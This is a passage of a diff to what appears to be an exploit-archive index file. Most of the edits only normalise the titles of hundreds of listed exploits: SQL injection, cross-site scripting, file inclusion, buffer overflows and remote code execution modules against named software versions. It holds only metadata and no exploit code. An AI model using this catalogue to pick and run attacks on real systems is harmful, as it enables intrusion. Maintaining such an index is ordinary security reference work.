Sieka",linux,remote,0 24853,platforms/linux/remote/24853.c,"MPlayer 0.9/1.0 MMST Get_Header Remote Client-Side Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",linux,remote,0 -24834,platforms/php/webapps/24834.txt,"PhpGedView 2.5/2.6 Calendar.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 -24835,platforms/php/webapps/24835.txt,"PhpGedView 2.5/2.6 Placelist.PHP SQL Injection Vulnerability",2004-01-12,JeiAr,php,webapps,0 +24834,platforms/php/webapps/24834.txt,"PhpGedView 2.5/2.6 Calendar.php Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 +24835,platforms/php/webapps/24835.txt,"PhpGedView 2.5/2.6 Placelist.php SQL Injection Vulnerability",2004-01-12,JeiAr,php,webapps,0 24836,platforms/cgi/webapps/24836.txt,"UseModWiki 1.0 Wiki.PL Cross-Site Scripting Vulnerability",2004-12-14,"Jeremy Bae",cgi,webapps,0 -24837,platforms/php/webapps/24837.txt,"PhpGedView 2.5/2.6 Timeline.PHP SQL Injection Vulnerability",2004-01-12,JeiAr,php,webapps,0 +24837,platforms/php/webapps/24837.txt,"PhpGedView 2.5/2.6 Timeline.php SQL Injection Vulnerability",2004-01-12,JeiAr,php,webapps,0 24838,platforms/asp/webapps/24838.txt,"Active Server Corner ASP Calendar 1.0 Administrative Access Vulnerability",2004-12-14,"ali reza AcTiOnSpIdEr",asp,webapps,0 24839,platforms/hardware/dos/24839.c,"Ricoh Aficio 450/455 PCL Printer Remote ICMP Denial of Service Vulnerability",2004-12-14,"Hongzhen Zhou",hardware,dos,0 24840,platforms/asp/webapps/24840.txt,"ASP-Rider Remote SQL Injection Vulnerability",2004-12-14,"Shervin Khaleghjou",asp,webapps,0 @@ -22091,8 +22091,8 @@ id,file,description,date,author,platform,type,port 24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL apply.cgi Command Execution",2013-04-10,metasploit,hardware,remote,0 24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit",2013-04-10,metasploit,multiple,remote,0 24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution",2013-04-08,agixid,linux,remote,0 -27434,platforms/php/webapps/27434.txt,"Oxynews Index.PHP SQL Injection Vulnerability",2006-03-16,R00T3RR0R,php,webapps,0 -27435,platforms/php/webapps/27435.txt,"PHPMyAdmin 2.8.1 Set_Theme Cross-Site Scripting Vulnerability",2006-03-16,"Ali Asad",php,webapps,0 +27434,platforms/php/webapps/27434.txt,"Oxynews Index.php SQL Injection Vulnerability",2006-03-16,R00T3RR0R,php,webapps,0 +27435,platforms/php/webapps/27435.txt,"phpMyAdmin 2.8.1 - Set_Theme Cross-Site Scripting Vulnerability",2006-03-16,"Ali Asad",php,webapps,0 27436,platforms/php/webapps/27436.txt,"Invision Power Services Invision Board 2.0.4 - Search Action Multiple Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 24951,platforms/linux/dos/24951.pl,"ircd-hybrid 8.0.5 - Denial of Service",2013-04-12,kingcope,linux,dos,0 24952,platforms/windows/dos/24952.py,"AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS",2013-04-12,xis_one,windows,dos,69 @@ -22113,19 +22113,19 @@ id,file,description,date,author,platform,type,port 25091,platforms/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote,0 25816,platforms/php/webapps/25816.txt,"Ovidentia FX - Remote File Include Vulnerability",2005-06-10,Status-x,php,webapps,0 25817,platforms/cgi/webapps/25817.txt,"JamMail 1.8 Jammail.pl Remote Arbitrary Command Execution Vulnerability",2005-06-12,blahplok,cgi,webapps,0 -25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 beta Image Gallery Index.PHP Cross-Site Scripting Vulnerability",2005-06-13,TheGreatOne2176,php,webapps,0 +25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 beta Image Gallery Index.php Cross-Site Scripting Vulnerability",2005-06-13,TheGreatOne2176,php,webapps,0 24972,platforms/windows/dos/24972.c,"Flightgear 2.0/2.4 - Remote Format String Exploit",2013-04-22,Kurono,windows,dos,0 24973,platforms/php/webapps/24973.txt,"VoipNow <= 2.5 - Local File Inclusion Vulnerability",2013-04-22,i-Hmx,php,webapps,0 24974,platforms/hardware/remote/24974.rb,"Netgear DGN2200B pppoe.cgi Remote Command Execution",2013-04-22,metasploit,hardware,remote,0 24975,platforms/hardware/webapps/24975.txt,"D'Link DIR-615 Hardware rev D3 / DIR-300 - Hardware rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0 24976,platforms/multiple/remote/24976.rb,"Java Applet Reflection Type Confusion Remote Code Execution",2013-04-23,metasploit,multiple,remote,0 -25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 Viewthread.PHP Information Disclosure Vulnerbility",2005-02-08,TheGreatOne2176,php,webapps,0 +25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 Viewthread.php Information Disclosure Vulnerbility",2005-02-08,TheGreatOne2176,php,webapps,0 24979,platforms/multiple/remote/24979.txt,"XLReader 0.9 - Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Kris Kubicki",multiple,remote,0 24980,platforms/multiple/remote/24980.txt,"Yanf 0.4 HTTP Response Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",multiple,remote,0 24981,platforms/multiple/remote/24981.txt,"JPegToAvi 1.5 File List Buffer Overflow Vulnerability",2004-12-15,"James Longstreet",multiple,remote,0 24982,platforms/multiple/remote/24982.txt,"Bolthole Filter 2.6.1 Address Parsing Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",multiple,remote,0 24983,platforms/multiple/remote/24983.txt,"Vilistextum 2.6.6 HTML Attribute Parsing Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",multiple,remote,0 -24984,platforms/multiple/remote/24984.txt,"2Fax 3.0 Tab Expansion Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",multiple,remote,0 +24984,platforms/multiple/remote/24984.txt,"2Fax 3.0 Tab Expansion - Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",multiple,remote,0 24985,platforms/php/remote/24985.txt,"PHP 4/5 addslashes() NULL Byte Bypass",2004-12-16,"Daniel Fabian",php,remote,0 24986,platforms/cgi/webapps/24986.txt,"Ikonboard 3.x - Multiple Remote SQL Injection Vulnerabilities",2004-12-16,anonymous,cgi,webapps,0 24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x - Remote Arbitrary Script Upload Vulnerability",2004-12-16,"Jeremy Bae",php,webapps,0 @@ -22139,7 +22139,7 @@ id,file,description,date,author,platform,type,port 24995,platforms/multiple/remote/24995.txt,"DXFScope 0.2 - Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Ariel Berkman",multiple,remote,0 24996,platforms/windows/remote/24996.rb,"SAP ConfigServlet Remote Unauthenticated Payload Execution",2013-04-25,"Andras Kabai",windows,remote,0 25184,platforms/php/webapps/25184.txt,"ProjectBB 0.4.5.1 - Multiple SQL Injection Vulnerabilities",2005-03-02,"benji lemien",php,webapps,0 -25185,platforms/php/webapps/25185.txt,"D-Forum 1.11 Nav.PHP3 - Cross-Site Scripting Vulnerability",2005-03-03,benjilenoob,php,webapps,0 +25185,platforms/php/webapps/25185.txt,"D-Forum 1.11 Nav.php3 - Cross-Site Scripting Vulnerability",2005-03-03,benjilenoob,php,webapps,0 25186,platforms/php/webapps/25186.txt,"Typo3 CMW_Linklist 1.4.1 Extension SQL Injection Vulnerability",2005-03-03,"Fabian Becker",php,webapps,0 25187,platforms/windows/remote/25187.txt,"Computalynx CProxy 3.3/3.4.x - Directory Traversal Vulnerability",2005-03-03,"Kristof Philipsen",windows,remote,0 25188,platforms/windows/remote/25188.txt,"Opera 7.x/Firefox 1.0/Internet Explorer 6.0 - Information Disclosure Weakness",2005-02-19,upken,windows,remote,0 @@ -22150,12 +22150,12 @@ id,file,description,date,author,platform,type,port 25193,platforms/php/webapps/25193.txt,"Jason Hines PHPWebLog 0.4/0.5 - Remote File Include Vulnerability",2005-03-07,"Filip Groszynski",php,webapps,0 25194,platforms/windows/remote/25194.txt,"Hosting Controller 1.x/6.1 - Multiple Information Disclosure Vulnerabilities",2005-03-07,"small mouse",windows,remote,0 29277,platforms/windows/remote/29277.txt,"winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0 -29278,platforms/php/webapps/29278.pl,"Work System ECommerce 3.0.3/3.0.4 Forum.PHP Remote File Include Vulnerability",2006-12-13,the_Edit0r,php,webapps,0 +29278,platforms/php/webapps/29278.pl,"Work System ECommerce 3.0.3/3.0.4 Forum.php Remote File Include Vulnerability",2006-12-13,the_Edit0r,php,webapps,0 24999,platforms/windows/remote/24999.py,"Windows Light HTTPD 0.1 - Buffer Overflow",2013-04-25,"Jacob Holcomb",windows,remote,0 25294,platforms/windows/remote/25294.rb,"Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability",2013-05-07,metasploit,windows,remote,0 25001,platforms/linux/remote/25001.rb,"GroundWork monarch_scan.cgi OS Command Injection",2013-04-25,metasploit,linux,remote,0 25002,platforms/php/webapps/25002.txt,"Hornbill Supportworks ITSM 1.0.0 - SQL Injection Vulnerability",2013-04-25,"Joseph Sheridan",php,webapps,0 -25003,platforms/php/webapps/25003.txt,"phpMyAdmin 3.5.8 and 4.0.0-RC2 - Multiple Vulnerabilities",2013-04-25,waraxe,php,webapps,0 +25003,platforms/php/webapps/25003.txt,"phpMyAdmin 3.5.8 / 4.0.0-RC2 - Multiple Vulnerabilities",2013-04-25,waraxe,php,webapps,0 25004,platforms/linux/dos/25004.txt,"QwikMail 0.3 HELO Command Buffer Overflow Vulnerability",2004-12-15,"Jonathan Rockway",linux,dos,0 25005,platforms/linux/remote/25005.txt,"NASM 0.98.x Error Preprocessor Directive Buffer Overflow Vulnerability",2004-12-15,"Jonathan Rockway",linux,remote,0 25006,platforms/linux/remote/25006.txt,"RTF2LATEX2E 1.0 - Stack Buffer Overflow Vulnerability",2004-12-16,"Limin Wang",linux,remote,0 @@ -22196,8 +22196,8 @@ id,file,description,date,author,platform,type,port 25040,platforms/php/local/25040.php,"PHP 4.x/5.0 Shared Memory Module Offset Memory Corruption Vulnerability",2004-12-20,"Stefano Di Paola",php,local,0 25041,platforms/cgi/webapps/25041.txt,"escripts software e_board 4.0 - Directory Traversal Vulnerability",2004-12-20,white_e@nogimmick.org,cgi,webapps,0 25042,platforms/cgi/webapps/25042.txt,"Tlen.pl 5.23.4.1 - Instant Messenger Remote Script Execution Vulnerability",2004-12-20,"Jaroslaw Sajko",cgi,webapps,0 -25043,platforms/php/webapps/25043.txt,"PHPGroupWare 0.9.14 Tables_Update.Inc.PHP Remote File Include Vulnerability",2004-01-27,"Cedric Cochin",php,webapps,0 -25044,platforms/php/webapps/25044.txt,"PHPGroupWare 0.9.x Index.PHP HTML Injection Vulnerability",2004-01-27,"Cedric Cochin",php,webapps,0 +25043,platforms/php/webapps/25043.txt,"PHPGroupWare 0.9.14 Tables_Update.Inc.php Remote File Include Vulnerability",2004-01-27,"Cedric Cochin",php,webapps,0 +25044,platforms/php/webapps/25044.txt,"PHPGroupWare 0.9.x Index.php HTML Injection Vulnerability",2004-01-27,"Cedric Cochin",php,webapps,0 25045,platforms/php/webapps/25045.txt,"2BGal 2.5.1 - Remote SQL Injection Vulnerability",2004-12-22,zib,php,webapps,0 25046,platforms/linux/dos/25046.c,"Snort 2.1/2.2 DecodeTCPOptions Remote Denial of Service Vulnerability (1)",2004-12-22,"Marcin Zgorecki",linux,dos,0 25047,platforms/linux/dos/25047.c,"Snort 2.1/2.2 DecodeTCPOptions Remote Denial of Service Vulnerability (2)",2004-12-22,Antimatt3r,linux,dos,0 @@ -22215,7 +22215,7 @@ id,file,description,date,author,platform,type,port 25059,platforms/php/webapps/25059.txt,"MercuryBoard 1.1 - Multiple Input Validation Vulnerabilities",2005-01-25,"Alberto Trivero",php,webapps,0 25060,platforms/asp/webapps/25060.txt,"Comersus Cart 5.0/6.0 - Multiple Vulnerabilities",2005-01-25,"raf somers",asp,webapps,0 25061,platforms/windows/dos/25061.txt,"Nullsoft Winamp 5.0.x - Variant IN_CDDA.dll Remote Buffer Overflow Vulnerability",2005-01-25,"Yu Yang",windows,dos,0 -25062,platforms/php/webapps/25062.txt,"Comdev eCommerce 3.0 INDEX.PHP Multiple Cross-Site Scripting Vulnerabilities",2005-01-25,SmOk3,php,webapps,0 +25062,platforms/php/webapps/25062.txt,"Comdev eCommerce 3.0 INDEX.php Multiple Cross-Site Scripting Vulnerabilities",2005-01-25,SmOk3,php,webapps,0 25063,platforms/windows/dos/25063.pl,"War FTP Daemon 1.8 - Remote Denial of Service Vulnerability",2005-01-27,MC.Iglo,windows,dos,0 25064,platforms/php/webapps/25064.txt,"Magic Winmail Server 4.0 (Build 1112) download.php Traversal Arbitrary File Access",2005-01-27,"Tan Chew Keong",php,webapps,0 25065,platforms/php/webapps/25065.txt,"Magic Winmail Server 4.0 (Build 1112) upload.php Traversal Arbitrary File Upload",2005-01-27,"Tan Chew Keong",php,webapps,0 @@ -22226,7 +22226,7 @@ id,file,description,date,author,platform,type,port 25070,platforms/linux/dos/25070.c,"ngIRCd 0.6/0.7/0.8 - Remote Buffer Overflow Vulnerability",2005-01-28,"Florian Westphal",linux,dos,0 25071,platforms/php/webapps/25071.txt,"Captaris Infinite Mobile Delivery Webmail 2.6 Path Disclosure Vulnerability",2005-01-29,steven@lovebug.org,php,webapps,0 25072,platforms/multiple/remote/25072.txt,"CitrusDB 0.1/0.2/0.3 Credit Card Data Remote Information Disclosure Vulnerability",2005-01-31,"Maximillian Dornseif",multiple,remote,0 -25073,platforms/php/webapps/25073.txt,"JShop E-Commerce Suite 1.2 Product.PHP Cross-Site Scripting Vulnerability",2005-01-31,SmOk3,php,webapps,0 +25073,platforms/php/webapps/25073.txt,"JShop E-Commerce Suite 1.2 Product.php Cross-Site Scripting Vulnerability",2005-01-31,SmOk3,php,webapps,0 25074,platforms/php/webapps/25074.txt,"xoops incontent module 3.0 - Directory Traversal Vulnerability",2005-01-28,Lostmon,php,webapps,0 25075,platforms/multiple/dos/25075.pl,"Eternal Lines Web Server 1.0 - Remote Denial of Service Vulnerability",2005-02-01,"Ziv Kamir",multiple,dos,0 25076,platforms/linux/dos/25076.c,"postgresql 7.x - Multiple Vulnerabilities",2005-02-01,ChoiX,linux,dos,0 @@ -22243,7 +22243,7 @@ id,file,description,date,author,platform,type,port 25087,platforms/php/webapps/25087.txt,"Joomla! <= 3.0.3 (remember.php) - PHP Object Injection Vulnerability",2013-04-26,EgiX,php,webapps,0 25088,platforms/php/webapps/25088.txt,"Foe CMS 1.6.5 - Multiple Vulnerabilities",2013-04-29,flux77,php,webapps,0 25092,platforms/windows/remote/25092.txt,"Software602 602 Lan Suite 2004 2004.0.04.1221 - Arbitrary File Upload Vulnerability",2005-02-08,"Tan Chew Keong",windows,remote,0 -25093,platforms/php/webapps/25093.txt,"MercuryBoard 1.1 INDEX.PHP SQL Injection Vulnerability",2005-02-09,Zeelock,php,webapps,0 +25093,platforms/php/webapps/25093.txt,"MercuryBoard 1.1 INDEX.php SQL Injection Vulnerability",2005-02-09,Zeelock,php,webapps,0 25094,platforms/windows/remote/25094.c,"MSN Messenger 6.2.0137 PNG Buffer Overflow Vulnerability",2005-02-08,ATmaCA,windows,remote,0 25095,platforms/windows/remote/25095.txt,"Microsoft Internet Explorer 5.0.1 Mouse Event URI Status Bar Obfuscation Weakness",2005-02-14,Paul,windows,remote,0 25096,platforms/cgi/webapps/25096.txt,"AWStats 5.x/6.x Debug Remote Information Disclosure Vulnerability",2005-02-14,GHC,cgi,webapps,0 @@ -22255,7 +22255,7 @@ id,file,description,date,author,platform,type,port 25102,platforms/php/webapps/25102.txt,"CitrusDB 0.3.6 - Remote Authentication Bypass Vulnerability",2004-02-15,"RedTeam Pentesting",php,webapps,0 25103,platforms/php/webapps/25103.txt,"PHP-Nuke 6.x/7.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-15,waraxe,php,webapps,0 25104,platforms/php/webapps/25104.txt,"CitrusDB 0.3.6 - Arbitrary Local PHP File Include Vulnerability",2005-02-15,"RedTeam Pentesting",php,webapps,0 -25105,platforms/php/webapps/25105.txt,"OSCommerce 2.2 Contact_us.PHP Cross-Site Scripting Vulnerability",2005-02-15,"John Cobb",php,webapps,0 +25105,platforms/php/webapps/25105.txt,"OSCommerce 2.2 Contact_us.php Cross-Site Scripting Vulnerability",2005-02-15,"John Cobb",php,webapps,0 25106,platforms/linux/local/25106.c,"Typespeed 0.4.1 - Local Format String Vulnerability",2005-02-16,"Ulf Harnhammar",linux,local,0 25107,platforms/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient Malformed IP Address Local Memory Access Vulnerability",2005-02-16,"Wang Ning",hardware,dos,0 25108,platforms/cgi/webapps/25108.txt,"AWStats 5.x/6.x Logfile Parameter Remote Command Execution Vulnerability",2005-02-16,newbug@chroot.org,cgi,webapps,0 @@ -22286,7 +22286,7 @@ id,file,description,date,author,platform,type,port 25133,platforms/multiple/remote/25133.txt,"xinkaa Web station 1.0.3 - Directory Traversal Vulnerability",2005-02-21,"Luigi Auriemma",multiple,remote,0 25134,platforms/linux/local/25134.c,"sudo 1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURCE Bypass",2013-05-01,aeon,linux,local,0 25135,platforms/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - (Date Parameter) Cross-Site Scripting Vulnerability",2013-05-01,demonalex,windows,dos,0 -25136,platforms/php/remote/25136.rb,"phpMyAdmin Authenticated Remote Code Execution via preg_replace()",2013-05-01,metasploit,php,remote,0 +25136,platforms/php/remote/25136.rb,"phpMyAdmin - Authenticated Remote Code Execution via preg_replace()",2013-05-01,metasploit,php,remote,0 25137,platforms/php/remote/25137.rb,"WordPress W3 Total Cache - PHP Code Execution",2013-05-01,metasploit,php,remote,0 25138,platforms/hardware/webapps/25138.txt,"D-Link IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0 25139,platforms/hardware/webapps/25139.txt,"Vivotek IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0 @@ -22301,11 +22301,11 @@ id,file,description,date,author,platform,type,port 25148,platforms/asp/webapps/25148.txt,"Mono 1.0.5 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-22,"Andrey Rusyaev",asp,webapps,0 25149,platforms/php/webapps/25149.txt,"iGeneric iG Shop 1.x - Multiple SQL Injection Vulnerabilities",2005-02-22,"John Cobb",php,webapps,0 25150,platforms/linux/remote/25150.txt,"Winace UnAce 1.x ACE Archive Remote Directory Traversal Vulnerability",2005-02-23,"Ulf Harnhammar",linux,remote,0 -25151,platforms/php/webapps/25151.txt,"PBLang Bulletin Board System 4.6 - Search.PHP Cross-Site Scripting Vulnerability",2005-02-23,"Hackerlounge Research Group",php,webapps,0 +25151,platforms/php/webapps/25151.txt,"PBLang Bulletin Board System 4.6 - Search.php Cross-Site Scripting Vulnerability",2005-02-23,"Hackerlounge Research Group",php,webapps,0 25152,platforms/php/webapps/25152.txt,"phpMyAdmin 2.6 - select_server.lib.php Multiple Parameter XSS",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 -25153,platforms/php/webapps/25153.txt,"phpMyAdmin 2.6 display_tbl_links.lib.php Multiple Parameter XSS",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 -25154,platforms/php/webapps/25154.txt,"phpMyAdmin 2.6 theme_left.css.php Multiple Parameter XSS",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 -25155,platforms/php/webapps/25155.txt,"phpMyAdmin 2.6 theme_right.css.php Multiple Parameter XSS",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 +25153,platforms/php/webapps/25153.txt,"phpMyAdmin 2.6 - display_tbl_links.lib.php Multiple Parameter XSS",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 +25154,platforms/php/webapps/25154.txt,"phpMyAdmin 2.6 - theme_left.css.php Multiple Parameter XSS",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 +25155,platforms/php/webapps/25155.txt,"phpMyAdmin 2.6 - theme_right.css.php Multiple Parameter XSS",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 25156,platforms/php/webapps/25156.txt,"phpMyAdmin 2.6 - Multiple Local File Include Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 25157,platforms/windows/remote/25157.txt,"Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability",2003-04-29,"Shane Hird",windows,remote,0 25158,platforms/php/webapps/25158.txt,"OOApp Guestbook Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,php,webapps,0 @@ -22326,11 +22326,11 @@ id,file,description,date,author,platform,type,port 25173,platforms/php/webapps/25173.txt,"PostNuke Phoenix 0.7x SHOW Parameter Remote SQL Injection Vulnerability",2005-02-28,"Maksymilian Arciemowicz",php,webapps,0 25174,platforms/php/webapps/25174.txt,"phpCOIN 1.2 mod.php Multiple Parameter XSS",2005-03-01,Lostmon,php,webapps,0 25175,platforms/php/webapps/25175.txt,"phpCOIN 1.2 login.php Multiple Parameter XSS",2005-03-01,Lostmon,php,webapps,0 -25176,platforms/php/webapps/25176.txt,"PBLang Bulletin Board System 4.x SendPM.PHP Directory Traversal Vulnerability",2005-03-01,Raven,php,webapps,0 +25176,platforms/php/webapps/25176.txt,"PBLang Bulletin Board System 4.x SendPM.php Directory Traversal Vulnerability",2005-03-01,Raven,php,webapps,0 25177,platforms/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 X-Forwarded-For Script Injection Vulnerability",2005-03-01,FraMe,php,webapps,0 25178,platforms/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0 -25179,platforms/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x DelPM.PHP Arbitrary Personal Message Deletion Vulnerability",2005-03-01,Raven,php,webapps,0 -25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - Auth.PHP Remote File Include Vulnerability",2005-03-01,mozako,php,webapps,0 +25179,platforms/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x DelPM.php Arbitrary Personal Message Deletion Vulnerability",2005-03-01,Raven,php,webapps,0 +25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - Auth.php Remote File Include Vulnerability",2005-03-01,mozako,php,webapps,0 25181,platforms/windows/remote/25181.py,"Cerulean Studios Trillian 3.0 - Remote PNG Image File Parsing Buffer Overflow Vulnerability",2005-03-02,"Tal Zeltzer",windows,remote,0 25182,platforms/php/webapps/25182.txt,"auraCMS 1.5 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-02,"echo staff",php,webapps,0 25195,platforms/windows/remote/25195.txt,"Oracle Database 8i/9i Multiple Remote Directory Traversal Vulnerabilities",2005-03-07,"Cesar Cerrudo",windows,remote,0 @@ -22350,7 +22350,7 @@ id,file,description,date,author,platform,type,port 25209,platforms/multiple/remote/25209.pl,"MySQL 4.x CREATE FUNCTION Arbitrary libc Code Execution",2005-03-11,"Stefano Di Paola",multiple,remote,0 25210,platforms/multiple/remote/25210.php,"MySQL 4.x CREATE FUNCTION mysql.func Table Arbitrary Library Injection",2005-03-11,"Stefano Di Paola",multiple,remote,0 25211,platforms/multiple/remote/25211.c,"MySQL 4.x - CREATE TEMPORARY TABLE Symlink Privilege Escalation",2006-01-18,"Marco Ivaldi",multiple,remote,0 -25212,platforms/php/webapps/25212.txt,"UBBCentral UBB.threads 6.0 Editpost.PHP SQL Injection Vulnerability",2005-03-11,"ADZ Security Team",php,webapps,0 +25212,platforms/php/webapps/25212.txt,"UBBCentral UBB.threads 6.0 Editpost.php SQL Injection Vulnerability",2005-03-11,"ADZ Security Team",php,webapps,0 25213,platforms/php/webapps/25213.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 viewall.php start Parameter SQL Injection",2005-03-12,sp3x@securityreason.com,php,webapps,0 25214,platforms/php/webapps/25214.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 category.php start Parameter SQL Injection",2005-03-12,sp3x@securityreason.com,php,webapps,0 25215,platforms/php/webapps/25215.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 viewall.php start Parameter XSS",2005-03-12,sp3x@securityreason.com,php,webapps,0 @@ -22362,15 +22362,15 @@ id,file,description,date,author,platform,type,port 25221,platforms/linux/remote/25221.txt,"Mozilla Suite/Firefox/Thunderbird Nested Anchor Tag Status Bar Spoofing Weakness",2005-03-14,"bitlance winter",linux,remote,0 25222,platforms/php/webapps/25222.html,"HolaCMS 1.2.x/1.4.x Voting Module Directory Traversal Remote File Corruption Vulnerability",2005-03-13,"Virginity Security",php,webapps,0 25223,platforms/php/webapps/25223.txt,"Phorum 5.0.14 - Multiple Subject and Attachment HTML Injection Vulnerabilities",2005-03-14,"Jon Oberheide",php,webapps,0 -25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 Guestbook.PHP SQL Injection Vulnerability",2005-03-14,visus,php,webapps,0 -25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 AdFrame.PHP Cross-Site Scripting Vulnerability",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0 -25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 Votebox.PHP Remote File Include Vulnerability",2005-03-14,SmOk3,php,webapps,0 +25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 Guestbook.php SQL Injection Vulnerability",2005-03-14,visus,php,webapps,0 +25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 AdFrame.php Cross-Site Scripting Vulnerability",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0 +25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 Votebox.php Remote File Include Vulnerability",2005-03-14,SmOk3,php,webapps,0 25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 PoC_loginform.php phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 PoC.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25229,platforms/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 ENGLISH_poc.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25230,platforms/php/webapps/25230.txt,"PunBB 1.2.3 - Multiple HTML Injection Vulnerabilities",2005-03-16,"benji lemien",php,webapps,0 25231,platforms/windows/dos/25231.txt,"Microsoft Windows 2000/2003/XP Graphical Device Interface Library Denial of Service Vulnerability",2005-03-17,"Hongzhen Zhou",windows,dos,0 -25232,platforms/php/webapps/25232.txt,"McNews 1.x Install.PHP Arbitrary File Include Vulnerability",2005-03-17,"Jonathan Whiteley",php,webapps,0 +25232,platforms/php/webapps/25232.txt,"McNews 1.x Install.php Arbitrary File Include Vulnerability",2005-03-17,"Jonathan Whiteley",php,webapps,0 25233,platforms/asp/webapps/25233.txt,"ACS Blog 0.8/0.9/1.0/1.1 - Search.ASP Cross-Site Scripting Vulnerability",2005-03-17,"farhad koosha",asp,webapps,0 25234,platforms/linux/local/25234.sh,"Linux Kernel 2.4.x / 2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities",2005-03-17,"Michal Zalewski",linux,local,0 25235,platforms/php/webapps/25235.txt,"Subdreamer 1.0 - SQL Injection Vulnerability",2005-03-18,"GHC team",php,webapps,0 @@ -22379,8 +22379,8 @@ id,file,description,date,author,platform,type,port 25238,platforms/multiple/remote/25238.txt,"Icecast 2.x - XSL Parser - Multiple Vulnerabilities",2005-03-18,patrick,multiple,remote,0 25239,platforms/php/webapps/25239.txt,"CoolForum 0.5/0.7/0.8 avatar.php img Parameter XSS",2005-03-19,Romano,php,webapps,0 25240,platforms/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 register.php login Parameter SQL Injection",2005-03-19,Romano,php,webapps,0 -25241,platforms/php/webapps/25241.html,"PHP-Fusion 4/5 Setuser.PHP HTML Injection Vulnerability",2005-03-19,"PersianHacker Team",php,webapps,0 -25242,platforms/php/webapps/25242.txt,"Ciamos 0.9.2 Highlight.PHP File Disclosure Vulnerability",2005-03-19,"Majid NT",php,webapps,0 +25241,platforms/php/webapps/25241.html,"PHP-Fusion 4/5 Setuser.php HTML Injection Vulnerability",2005-03-19,"PersianHacker Team",php,webapps,0 +25242,platforms/php/webapps/25242.txt,"Ciamos 0.9.2 Highlight.php File Disclosure Vulnerability",2005-03-19,"Majid NT",php,webapps,0 25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script Remote File Include Vulnerability",2005-03-21,Frank_Reiner,php,webapps,0 25244,platforms/php/webapps/25244.txt,"CzarNews 1.13/1.14 headlines.php Remote File Inclusion",2005-03-21,brOmstar,php,webapps,0 25245,platforms/php/webapps/25245.txt,"Social Site Generator 2.2 - CSRF Add Admin Exploit",2013-05-06,Fallaga,php,webapps,0 @@ -22394,7 +22394,7 @@ id,file,description,date,author,platform,type,port 25254,platforms/asp/webapps/25254.txt,"betaparticle blog 2.0/3.0 myFiles.asp Unauthenticated File Manipulation",2005-03-21,"farhad koosha",asp,webapps,0 25255,platforms/windows/dos/25255.txt,"FUN labs Game Engine Multiple Remote Denial of Service 